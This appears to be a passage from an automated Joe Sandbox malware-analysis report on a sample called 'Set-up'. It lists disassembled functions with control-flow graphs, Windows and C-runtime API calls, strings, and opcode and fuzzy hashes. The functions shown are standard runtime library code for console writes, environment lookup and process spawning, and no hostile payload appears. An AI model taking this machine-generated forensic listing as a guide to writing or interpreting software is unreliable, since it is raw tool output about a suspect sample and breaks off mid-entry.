6bb88220-6bb88231 call 6bb62a20 1266->1287 1281 6bb73565-6bb73566 1273->1281 1275->1253 1278->1247 1279->1235 1282->1254 1282->1255 1287->1228 1294 6bb88233-6bb88238 1287->1294 1295 6bb8823a-6bb88249 call 6bb62a20 1294->1295 1296 6bb8824f-6bb88252 1294->1296 1295->1191 1295->1296 1296->1233
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT(?), ref: 6BB7340B
                                                                                              • _calloc_crt.MSVCR100(00000002,00000002), ref: 6BB73438
                                                                                              • _wdupenv_s.MSVCR100(?,00000000,?), ref: 6BB73455
                                                                                              • _wcslen.LIBCMT(?), ref: 6BB73469
                                                                                              • _wcslen.LIBCMT(?), ref: 6BB7347D
                                                                                              • wcscpy_s.MSVCR100(?,?,00000000,00000000,00000000,00000000,00000000), ref: 6BB734B4
                                                                                              • _wcslen.LIBCMT(?,?,?,?,00000000,00000000,00000000,00000000), ref: 6BB734C6
                                                                                              • wcscpy_s.MSVCR100(?,?,00000000,00000000,00000000,00000000,00000000), ref: 6BB734EA
                                                                                              • _wcslen.LIBCMT(?,?,?,?,00000000,00000000,00000000,00000000), ref: 6BB734FC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$wcscpy_s$_calloc_crt_wdupenv_s
                                                                                              • String ID: SystemRoot
                                                                                              • API String ID: 2825862306-2034820756
                                                                                              • Opcode ID: b882a74bf9180e1e0cc70d94a6f8b9de631b3b29803e8a89abdc0e13ed7ceec0
                                                                                              • Instruction ID: 9a4d9e493450ecb7f9c73bd4f5c2a1141f163f347d46b292c712f582a813eb27
                                                                                              • Opcode Fuzzy Hash: b882a74bf9180e1e0cc70d94a6f8b9de631b3b29803e8a89abdc0e13ed7ceec0
                                                                                              • Instruction Fuzzy Hash: 98D19B72E04299DFDB25EFA8DC8199EB7F5FF08314B10406DE815AB250EB39AD41CB50
                                                                                              Function 6BB6DD9D Relevance: 49.3, APIs: 10, Strings: 18, Instructions: 277COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1300 6bb6dd9d-6bb6ddb1 1301 6bb6ddb7-6bb6ddd8 1300->1301 1302 6bb6dcdc-6bb6dcec call 6bbd5907 1300->1302 1303 6bb6dd53-6bb6dd56 1301->1303 1304 6bb6ddde 1301->1304 1314 6bb6f71e-6bb6f721 1302->1314 1309 6bb71e22-6bb71e2a call 6bb6d89c 1303->1309 1310 6bb6dd5c 1303->1310 1306 6bb6dde4-6bb6ddf4 call 6bb6f3db 1304->1306 1307 6bb6e1b9-6bb6e1bf 1304->1307 1323 6bb6f6d1-6bb6f6e9 1306->1323 1324 6bb6ddfa-6bb6ddff 1306->1324 1311 6bb6e1c5 1307->1311 1312 6bb6dd79 1307->1312 1318 6bb71e2f 1309->1318 1310->1312 1316 6bb6dd5e-6bb6dd61 1310->1316 1322 6bb6e1e1-6bb6e1e9 call 6bb6d89c 1311->1322 1321 6bb6dd7c-6bb6dd96 call 6bb6f4ec 1312->1321 1319 6bb6dd67-6bb6dd6a 1316->1319 1320 6bb6f15a-6bb6f15c 1316->1320 1318->1318 1325 6bb71d86 1319->1325 1326 6bb6dd70-6bb6dd73 1319->1326 1333 6bb6f2a8-6bb6f2ca call 6bb6d5c4 call 6bb6d7fe call 6bb6d7cf 1320->1333 1321->1324 1345 6bb6dd98 1321->1345 1322->1324 1328 6bb6dc5f-6bb6dc83 call 6bb6f670 1323->1328 1329 6bb6f6ef-6bb6f6f2 1323->1329 1331 6bb6de05-6bb6de0a 1324->1331 1332 6bb71d58-6bb71d60 1324->1332 1325->1309 1326->1312 1334 6bb6e1ee-6bb6e204 1326->1334 1365 6bb6dc85-6bb6dc8d call 6bb6f3db 1328->1365 1366 6bb6dc92-6bb6dc9d 1328->1366 1336 6bb6f706-6bb6f71b call 6bb6f670 1329->1336 1337 6bb6f6f4-6bb6f6f7 1329->1337 1342 6bb6de10-6bb6de12 1331->1342 1343 6bb6e25d-6bb6e285 call 6bb6d5fc call 6bb6d7fe 1331->1343 1346 6bb71d6a-6bb71d6f 1332->1346 1333->1323 1340 6bb71d1f-6bb71d22 1334->1340 1341 6bb6e20a-6bb6e20d 1334->1341 1336->1314 1348 6bb6dca2-6bb6dcb2 call 6bb6d89c 1337->1348 1349 6bb6f6fd-6bb6f700 1337->1349 1354 6bb6dc34-6bb6dc39 1340->1354 1355 6bb71d28-6bb71d2b 1340->1355 1352 6bb6e213-6bb6e216 1341->1352 1353 6bb6f7aa-6bb6f7af 1341->1353 1342->1343 1356 6bb6de18-6bb6de1a 1342->1356 1345->1300 1346->1322 1348->1336 1390 6bb6dcb8-6bb6dcc5 call 6bb6f3db 1348->1390 1349->1336 1358 6bb6dcca-6bb6dcd7 call 6bb6d89c 1349->1358 1360 6bb71d7e-6bb71d80 1352->1360 1361 6bb6e21c-6bb6e21f 1352->1361 1353->1322 1354->1322 1362 6bb6dbc5-6bb6dbc8 1355->1362 1363 6bb71d31-6bb71d34 1355->1363 1356->1343 1368 6bb6de20-6bb6de22 1356->1368 1358->1336 1360->1325 1375 6bb71d74-6bb71d79 1361->1375 1376 6bb6e225-6bb6e228 1361->1376 1371 6bb6dc20-6bb6dc25 1362->1371 1372 6bb6dbca-6bb6dbcc 1362->1372 1363->1346 1378 6bb71d36-6bb71d39 1363->1378 1365->1366 1377 6bb6de48-6bb6de4f 1366->1377 1368->1343 1380 6bb6de28-6bb6de2b 1368->1380 1371->1322 1383 6bb6dbce-6bb6dbd1 1372->1383 1384 6bb6dc0b-6bb6dc1b call 6bb74e1a 1372->1384 1375->1322 1385 6bb6dc3e-6bb6dc44 1376->1385 1386 6bb6e22e-6bb6e233 1376->1386 1387 6bb71d3f-6bb71d42 1378->1387 1388 6bb6dc2a-6bb6dc2f 1378->1388 1391 6bb6e240-6bb6e247 1380->1391 1392 6bb6de31-6bb6de37 1380->1392 1395 6bb6dbd3-6bb6dbd9 1383->1395 1396 6bb6dbe9-6bb6dc06 call 6bb6dd9d call 6bbd592b 1383->1396 1384->1324 1385->1346 1394 6bb6dc4a-6bb6dc4d 1385->1394 1386->1322 1387->1346 1399 6bb71d44-6bb71d49 1387->1399 1388->1322 1390->1336 1391->1343 1398 6bb6e249-6bb6e24b 1391->1398 1392->1333 1401 6bb6de3d-6bb6de45 1392->1401 1394->1321 1395->1346 1403 6bb6dbdf-6bb6dbe4 1395->1403 1396->1314 1398->1343 1406 6bb6e24d-6bb6e24f 1398->1406 1399->1322 1401->1377 1403->1322 1406->1343 1409 6bb6e251-6bb6e253 1406->1409 1409->1343 1411 6bb6e255-6bb6e257 1409->1411 1411->1343 1411->1392
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameName::Name::operator+$operator+
                                                                                              • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $bool$const$double$long $signed $unsigned $void$volatile$wchar_t
                                                                                              • API String ID: 919369367-1531502760
                                                                                              • Opcode ID: b4511b0a24dd9b494f8315a5d21fe8add0d6a5ac8e371b6b44f8b7e73b2f8853
                                                                                              • Instruction ID: 8cbdee95224edd2019a09d154109f48a7652cb771e0b1cfd7236bfd7229fa0e0
                                                                                              • Opcode Fuzzy Hash: b4511b0a24dd9b494f8315a5d21fe8add0d6a5ac8e371b6b44f8b7e73b2f8853
                                                                                              • Instruction Fuzzy Hash: 8291DD75D841C9AACF14DFA8EC90AAD7774EF067D0F2041A6E921EA190F77D8E44CB21
                                                                                              Function 6BB7022F Relevance: 47.0, APIs: 31, Instructions: 498fileCOMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1413 6bb7022f-6bb70267 call 6bb64f20 1416 6bb8fd8e 1413->1416 1417 6bb7026d-6bb7026f 1413->1417 1419 6bb8fd95-6bb8fdac call 6bb6aafe call 6bb607b5 call 6bbdaeae 1416->1419 1418 6bb70275-6bb702a3 1417->1418 1417->1419 1420 6bb8fdb4-6bb8fdbc 1418->1420 1421 6bb702a9-6bb702ac 1418->1421 1419->1420 1423 6bb702b2-6bb702b7 1420->1423 1424 6bb8fdc2-6bb8fdda call 6bb6aafe call 6bb607b5 call 6bbdaeae 1420->1424 1421->1420 1421->1423 1426 6bb8fddf-6bb8fdeb call 6bbd84d6 1423->1426 1427 6bb702bd-6bb702c6 call 6bb701ee 1423->1427 1452 6bb902ee 1424->1452 1438 6bb8fdf3-6bb8fdfa 1426->1438 1427->1438 1439 6bb702cc 1427->1439 1438->1439 1442 6bb8fe00-6bb8fe28 call 6bb606c7 GetConsoleMode 1438->1442 1443 6bb702ce-6bb702d5 1439->1443 1442->1443 1457 6bb8fe2e-6bb8fe30 1442->1457 1446 6bb702db-6bb702f7 WriteFile 1443->1446 1447 6bb70028-6bb70035 1443->1447 1450 6bb700e5-6bb90279 GetLastError 1446->1450 1451 6bb702fd-6bb7030a 1446->1451 1453 6bb9008c-6bb90093 1447->1453 1454 6bb7003b-6bb70044 1447->1454 1468 6bb90284-6bb9028b 1450->1468 1458 6bb70310-6bb70317 1451->1458 1455 6bb90099-6bb900a2 1453->1455 1456 6bb90166-6bb90175 1453->1456 1460 6bb70046 1454->1460 1461 6bb700c0-6bb700d0 1454->1461 1462 6bb902ba-6bb902c7 1455->1462 1463 6bb900a8-6bb900bf 1455->1463 1456->1462 1469 6bb9017b-6bb90196 1456->1469 1464 6bb8fe3e-6bb8fe5b GetConsoleCP 1457->1464 1465 6bb8fe32-6bb8fe38 1457->1465 1467 6bb7031d-6bb70337 call 6bb607a7 1458->1467 1458->1468 1460->1462 1466 6bb7004b-6bb7004e 1461->1466 1473 6bb902c9-6bb902d2 1462->1473 1474 6bb902db-6bb902eb call 6bb607b5 call 6bb6aafe 1462->1474 1472 6bb900c0-6bb900c3 1463->1472 1464->1468 1475 6bb8fe61 1464->1475 1465->1443 1465->1464 1470 6bb70050-6bb7005d 1466->1470 1471 6bb7006b-6bb70099 WriteFile 1466->1471 1468->1462 1477 6bb9028d-6bb90296 1468->1477 1478 6bb90197-6bb9019a 1469->1478 1479 6bb700d5-6bb700e0 1470->1479 1480 6bb7005f-6bb70069 1470->1480 1471->1450 1483 6bb7009b-6bb700a9 1471->1483 1481 6bb90108-6bb90136 WriteFile 1472->1481 1482 6bb900c5-6bb900d5 1472->1482 1473->1474 1484 6bb902d4-6bb902d6 1473->1484 1474->1452 1486 6bb8fe67-6bb8fe6f 1475->1486 1488 6bb90298-6bb902aa call 6bb607b5 call 6bb6aafe 1477->1488 1489 6bb902ac-6bb902b8 call 6bb6ab0f 1477->1489 1490 6bb9019c-6bb901b0 1478->1490 1491 6bb901d7-6bb90208 WideCharToMultiByte 1478->1491 1479->1480 1480->1466 1480->1471 1481->1450 1500 6bb9013c-6bb9014a 1481->1500 1497 6bb900f1-6bb90106 1482->1497 1498 6bb900d7-6bb900eb 1482->1498 1483->1458 1499 6bb700af-6bb700ba 1483->1499 1493 6bb8ffdc-6bb8ffde 1486->1493 1494 6bb8fe75-6bb8fe93 1486->1494 1488->1452 1489->1452 1502 6bb901c0-6bb901d5 1490->1502 1503 6bb901b2-6bb901ba 1490->1503 1491->1450 1492 6bb9020e-6bb90237 WriteFile 1491->1492 1506 6bb90239-6bb90241 1492->1506 1507 6bb90245-6bb9024b GetLastError 1492->1507 1504 6bb8ffe0-6bb8ffe2 1493->1504 1505 6bb8ffe4-6bb8ffff 1493->1505 1511 6bb8feaa-6bb8feb6 call 6bb6d107 1494->1511 1512 6bb8fe95-6bb8fea8 1494->1512 1497->1472 1497->1481 1498->1497 1499->1458 1499->1461 1500->1458 1509 6bb90150-6bb9015b 1500->1509 1502->1478 1502->1491 1503->1502 1504->1505 1514 6bb90005-6bb90007 1504->1514 1505->1514 1515 6bb90251-6bb90253 1506->1515 1516 6bb90243 1506->1516 1507->1515 1509->1458 1520 6bb90161 1509->1520 1531 6bb8feb8-6bb8fec8 1511->1531 1532 6bb8fef2-6bb8fef4 1511->1532 1517 6bb8fef5-6bb8ff07 call 6bb6d126 1512->1517 1523 6bb90009-6bb9000b 1514->1523 1524 6bb9000d-6bb90020 call 6bbd969c 1514->1524 1515->1458 1525 6bb90259-6bb9026e 1515->1525 1516->1492 1517->1458 1537 6bb8ff0d-6bb8ff38 WideCharToMultiByte 1517->1537 1520->1463 1523->1524 1528 6bb9005f-6bb90068 1523->1528 1524->1450 1539 6bb90026-6bb90034 1524->1539 1525->1458 1530 6bb90274 1525->1530 1528->1458 1538 6bb9006e 1528->1538 1530->1469 1534 6bb8fece-6bb8fee3 call 6bb6d126 1531->1534 1535 6bb90073-6bb90087 1531->1535 1532->1517 1534->1458 1546 6bb8fee9-6bb8fef0 1534->1546 1535->1458 1537->1458 1541 6bb8ff3e-6bb8ff5f WriteFile 1537->1541 1538->1486 1539->1528 1543 6bb90036-6bb9004d call 6bbd969c 1539->1543 1541->1450 1544 6bb8ff65-6bb8ff7f 1541->1544 1543->1450 1550 6bb90053-6bb90059 1543->1550 1544->1458 1547 6bb8ff85-6bb8ff8c 1544->1547 1546->1537 1547->1528 1549 6bb8ff92-6bb8ffb8 WriteFile 1547->1549 1549->1450 1551 6bb8ffbe-6bb8ffc5 1549->1551 1550->1528 1551->1458 1552 6bb8ffcb-6bb8ffd7 1551->1552 1552->1528
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32 ref: 6BB700E5
                                                                                              • _isatty.MSVCR100(?,?,00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002), ref: 6BB702BE
                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE), ref: 6BB702EF
                                                                                              • __doserrno.MSVCR100(00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?), ref: 6BB8FD95
                                                                                              • _errno.MSVCR100(00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?), ref: 6BB8FD9C
                                                                                              • _invalid_parameter_noinfo.MSVCR100(00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?), ref: 6BB8FDA7
                                                                                              • __doserrno.MSVCR100(?,00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0), ref: 6BB8FDC2
                                                                                              • _errno.MSVCR100(?,00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0), ref: 6BB8FDCA
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0), ref: 6BB8FDD5
                                                                                              • __lseeki64_nolock.LIBCMT ref: 6BB8FDE6
                                                                                              • _getptd.MSVCR100(?,00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0), ref: 6BB8FE00
                                                                                              • GetConsoleMode.KERNEL32(?,?,?,00000002,?,?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002), ref: 6BB8FE1E
                                                                                              • GetConsoleCP.KERNEL32(?,6BB703AC,?,?,?,6BB703C8,00000010,6BB889FE,?,00000000,00000002,?,6BC035D0,?,?), ref: 6BB8FE3E
                                                                                              • isleadbyte.MSVCR100(00000000), ref: 6BB8FEAE
                                                                                              • __fassign.LIBCMT(?,?,00000002), ref: 6BB8FED8
                                                                                              • __fassign.LIBCMT(?,?,00000001), ref: 6BB8FEFC
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 6BB8FF2E
                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6BB8FF57
                                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6BB8FFB0
                                                                                              • _putwch_nolock.MSVCR100(?), ref: 6BB90013
                                                                                              • _putwch_nolock.MSVCR100(0000000D), ref: 6BB90040
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite$Console__doserrno__fassign_errno_invalid_parameter_noinfo_putwch_nolock$ByteCharErrorLastModeMultiWide__lseeki64_nolock_getptd_isattyisleadbyte
                                                                                              • String ID:
                                                                                              • API String ID: 1737003884-0
                                                                                              • Opcode ID: 75808482fdfb5076dcc6b03df606a70c72b1e9c715eed87b0587de04fb7409d6
                                                                                              • Instruction ID: ff4001fc1df9e5b2dd5f67fbd8efc9d316114e5b5db655d7bbda745e5e03e7d0
                                                                                              • Opcode Fuzzy Hash: 75808482fdfb5076dcc6b03df606a70c72b1e9c715eed87b0587de04fb7409d6
                                                                                              • Instruction Fuzzy Hash: 3A129F35A066A88FDB219F28DC80BD977B4FF0B314F4405EAE41AD7981D7799A80CF52
                                                                                              Function 6BB73687 Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1553 6bb73687-6bb7369d 1554 6bb88499-6bb884a9 call 6bb607b5 call 6bbdaeae 1553->1554 1555 6bb736a3-6bb736a6 1553->1555 1568 6bb884b1-6bb884bc call 6bbdaeae 1554->1568 1555->1554 1556 6bb736ac-6bb736b2 1555->1556 1558 6bb736b4-6bb736b8 1556->1558 1559 6bb7371a-6bb7371f call 6bb607b5 1556->1559 1558->1559 1561 6bb736ba-6bb736bd 1558->1561 1559->1568 1561->1559 1564 6bb736bf-6bb736e8 call 6bb607b5 * 2 call 6bb735d0 1561->1564 1574 6bb884c4-6bb884cc call 6bb607b5 1564->1574 1579 6bb736ee-6bb736f5 call 6bb607b5 1564->1579 1568->1574 1574->1579 1580 6bb884d2-6bb884e0 call 6bb60bfe 1574->1580 1585 6bb736f7-6bb736ff call 6bb607b5 1579->1585 1586 6bb73701-6bb73703 1579->1586 1580->1579 1589 6bb884e6-6bb884fa call 6bb6fd24 1580->1589 1585->1586 1587 6bb8862a-6bb88630 call 6bb6014e 1586->1587 1588 6bb73709-6bb7370c 1586->1588 1593 6bb88636-6bb8863e call 6bb6014e 1587->1593 1592 6bb73712-6bb73719 1588->1592 1588->1593 1599 6bb884fc-6bb884ff 1589->1599 1600 6bb8850f-6bb88512 1589->1600 1599->1579 1602 6bb88505 1599->1602 1600->1579 1603 6bb88518-6bb8851f 1600->1603 1604 6bb8850a call 6bbdae5c 1602->1604 1605 6bb88520 call 6bb61ee1 1603->1605 1604->1600 1606 6bb88525-6bb8852b 1605->1606 1606->1579 1607 6bb88531-6bb8853a 1606->1607 1608 6bb88612-6bb8861f call 6bb70cf8 1607->1608 1608->1579 1611 6bb88625 1608->1611 1611->1579 1613 6bb88548-6bb88559 call 6bb628e5 1611->1613 1616 6bb8855b-6bb8855e 1613->1616 1617 6bb88573-6bb88592 call 6bb628e5 * 2 1613->1617 1616->1617 1618 6bb88560-6bb88571 call 6bb62a20 1616->1618 1617->1579 1625 6bb88598-6bb885a7 call 6bb62a20 1617->1625 1618->1602 1618->1617 1625->1602 1628 6bb885ad-6bb885cc call 6bb607b5 call 6bb735d0 1625->1628 1628->1579 1633 6bb885d2-6bb885da call 6bb607b5 1628->1633 1636 6bb88609-6bb8860f 1633->1636 1637 6bb885dc-6bb885e4 call 6bb6aafe 1633->1637 1636->1608 1637->1636 1640 6bb885e6-6bb885ec 1637->1640 1641 6bb885ee-6bb885f1 1640->1641 1642 6bb885f7-6bb885fe 1640->1642 1641->1579 1641->1642 1642->1636 1643 6bb88600-6bb88603 1642->1643 1643->1579 1643->1636
                                                                                              APIs
                                                                                              • _errno.MSVCR100 ref: 6BB736BF
                                                                                              • _errno.MSVCR100 ref: 6BB736C9
                                                                                              • _wspawnve.MSVCR100(?,?,?,?), ref: 6BB736DA
                                                                                                • Part of subcall function 6BB735D0: wcsrchr.MSVCR100(?,0000005C), ref: 6BB7360D
                                                                                                • Part of subcall function 6BB735D0: wcsrchr.MSVCR100(?,0000002F,?,0000005C), ref: 6BB73617
                                                                                                • Part of subcall function 6BB735D0: wcsrchr.MSVCR100(00000000,0000002E), ref: 6BB73636
                                                                                                • Part of subcall function 6BB735D0: _waccess_s.MSVCR100(?,00000000), ref: 6BB7364A
                                                                                              • _errno.MSVCR100 ref: 6BB736EE
                                                                                              • _errno.MSVCR100 ref: 6BB736F7
                                                                                              • _errno.MSVCR100 ref: 6BB7371A
                                                                                              • _errno.MSVCR100 ref: 6BB88499
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB884A4
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB884B7
                                                                                              • _errno.MSVCR100 ref: 6BB884C4
                                                                                              • wcschr.MSVCR100(?,0000002F), ref: 6BB884D7
                                                                                              • _wdupenv_s.MSVCR100(?,00000000,PATH), ref: 6BB884F0
                                                                                              • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000), ref: 6BB8850A
                                                                                              • _calloc_crt.MSVCR100(00000104,00000002), ref: 6BB88520
                                                                                              • _wcslen.LIBCMT(00000000), ref: 6BB88549
                                                                                              • wcscat_s.MSVCR100(00000000,00000104,6BB93050), ref: 6BB88567
                                                                                              • _wcslen.LIBCMT(00000000), ref: 6BB88574
                                                                                              • _wcslen.LIBCMT(?,00000000), ref: 6BB8857F
                                                                                              • wcscat_s.MSVCR100(00000000,00000104,?), ref: 6BB8859D
                                                                                              • _errno.MSVCR100 ref: 6BB885AD
                                                                                              • _wspawnve.MSVCR100(?,00000000,?,?), ref: 6BB885BE
                                                                                              • _errno.MSVCR100 ref: 6BB885D2
                                                                                              • __doserrno.MSVCR100 ref: 6BB885DC
                                                                                              • free.MSVCR100(00000000), ref: 6BB8862B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$_wcslenwcsrchr$_invalid_parameter_noinfo_wspawnvewcscat_s$__doserrno__invoke_watson_calloc_crt_waccess_s_wdupenv_sfreewcschr
                                                                                              • String ID: PATH
                                                                                              • API String ID: 3726462291-1036084923
                                                                                              • Opcode ID: a46b813423a7757e377d8caea16daa6f804180a32b6348ea1167c17d0804fc95
                                                                                              • Instruction ID: 4cc23ca6b07180cfef1deab58421ed98b8e5807cbf71c537e555d9a9f49b2137
                                                                                              • Opcode Fuzzy Hash: a46b813423a7757e377d8caea16daa6f804180a32b6348ea1167c17d0804fc95
                                                                                              • Instruction Fuzzy Hash: 6651E175804684AFCB31AF75DC819AE3775EF46764B2001A5E83497190FB3DCD41DB62
                                                                                              Function 6BB70AC7 Relevance: 42.3, APIs: 28, Instructions: 254COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1644 6bb70ac7-6bb70b0d 1645 6bb70b13-6bb70b15 1644->1645 1646 6bb910c4-6bb910d3 call 6bb607b5 call 6bbdaeae 1644->1646 1645->1646 1647 6bb70b1b-6bb70b1d 1645->1647 1649 6bb910d8-6bb910dd 1646->1649 1647->1649 1650 6bb70b23-6bb70b26 1647->1650 1649->1646 1652 6bb911aa-6bb911b4 call 6bb607b5 1650->1652 1653 6bb70b2c-6bb70b35 call 6bb607b5 1650->1653 1661 6bb911ba-6bb911bf call 6bb607b5 1652->1661 1660 6bb70b36 call 6bb627b6 1653->1660 1662 6bb70b3b-6bb70b52 call 6bb607b5 1660->1662 1669 6bb911c6-6bb911d1 call 6bb6014e 1661->1669 1667 6bb910df-6bb910f1 _wfullpath 1662->1667 1668 6bb70b58-6bb70b70 call 6bb6fd24 1662->1668 1670 6bb70cc9-6bb70cd5 1667->1670 1671 6bb910f7-6bb910fa 1667->1671 1678 6bb70b76-6bb70b7e 1668->1678 1679 6bb910ff-6bb91102 1668->1679 1681 6bb911d7-6bb911e8 1669->1681 1670->1669 1674 6bb70cdb-6bb70cf0 call 6bb6014e 1670->1674 1671->1661 1688 6bb70cf1 call 6bb607a7 1674->1688 1678->1652 1680 6bb70b84-6bb70ba8 call 6bb628e5 1678->1680 1679->1652 1683 6bb91108 1679->1683 1694 6bb91112-6bb91123 call 6bb628e5 1680->1694 1695 6bb70bae-6bb70bb5 call 6bb607b5 1680->1695 1686 6bb911ea-6bb911f5 call 6bb6014e 1681->1686 1687 6bb911f6-6bb91201 call 6bb607b5 1681->1687 1684 6bb9110d 1683->1684 1689 6bb9110d call 6bbdae5c 1684->1689 1686->1687 1687->1661 1692 6bb70cf6-6bb70cf7 1688->1692 1689->1694 1702 6bb91124 call 6bb61ee1 1694->1702 1703 6bb70bbb-6bb70bc2 1695->1703 1704 6bb91129-6bb91134 1702->1704 1703->1652 1705 6bb70bc8-6bb70bf1 call 6bb70cf8 1703->1705 1704->1695 1706 6bb9113a-6bb9114a call 6bb607b5 1704->1706 1711 6bb70bf7-6bb70c01 1705->1711 1712 6bb9114c-6bb91158 1705->1712 1706->1661 1711->1652 1713 6bb70c07-6bb70c24 call 6bb628e5 1711->1713 1712->1652 1714 6bb9115a-6bb91162 call 6bb607b5 1712->1714 1719 6bb70c26-6bb70c29 1713->1719 1720 6bb70c3f-6bb70c5b call 6bb629c7 1713->1720 1714->1652 1721 6bb91164-6bb91175 call 6bb628e5 1714->1721 1719->1720 1723 6bb70c2b-6bb70c2e 1719->1723 1729 6bb70c61-6bb70c62 1720->1729 1730 6bb91214-6bb9121b 1720->1730 1728 6bb91176 call 6bb61ee1 1721->1728 1723->1720 1725 6bb70c30-6bb70c39 1723->1725 1725->1720 1731 6bb9117b-6bb91186 1728->1731 1732 6bb70c68 call 6bb627b6 1729->1732 1730->1684 1731->1706 1733 6bb91188-6bb911a4 call 6bb70cf8 1731->1733 1734 6bb70c6d-6bb70c71 1732->1734 1733->1652 1733->1711 1734->1703 1736 6bb70c77-6bb70c85 1734->1736 1736->1681 1738 6bb70c8b-6bb70caf call 6bb607b5 call 6bb629c7 1736->1738 1738->1730 1743 6bb70cb5-6bb70cc1 1738->1743 1744 6bb70cc7 1743->1744 1745 6bb91203-6bb9120e call 6bb6014e 1743->1745 1744->1670 1745->1730
                                                                                              APIs
                                                                                              • _errno.MSVCR100 ref: 6BB70B2C
                                                                                              • _waccess_s.MSVCR100(?,00000000), ref: 6BB70B36
                                                                                                • Part of subcall function 6BB627B6: GetFileAttributesW.KERNEL32(?), ref: 6BB627D7
                                                                                              • _errno.MSVCR100 ref: 6BB70B43
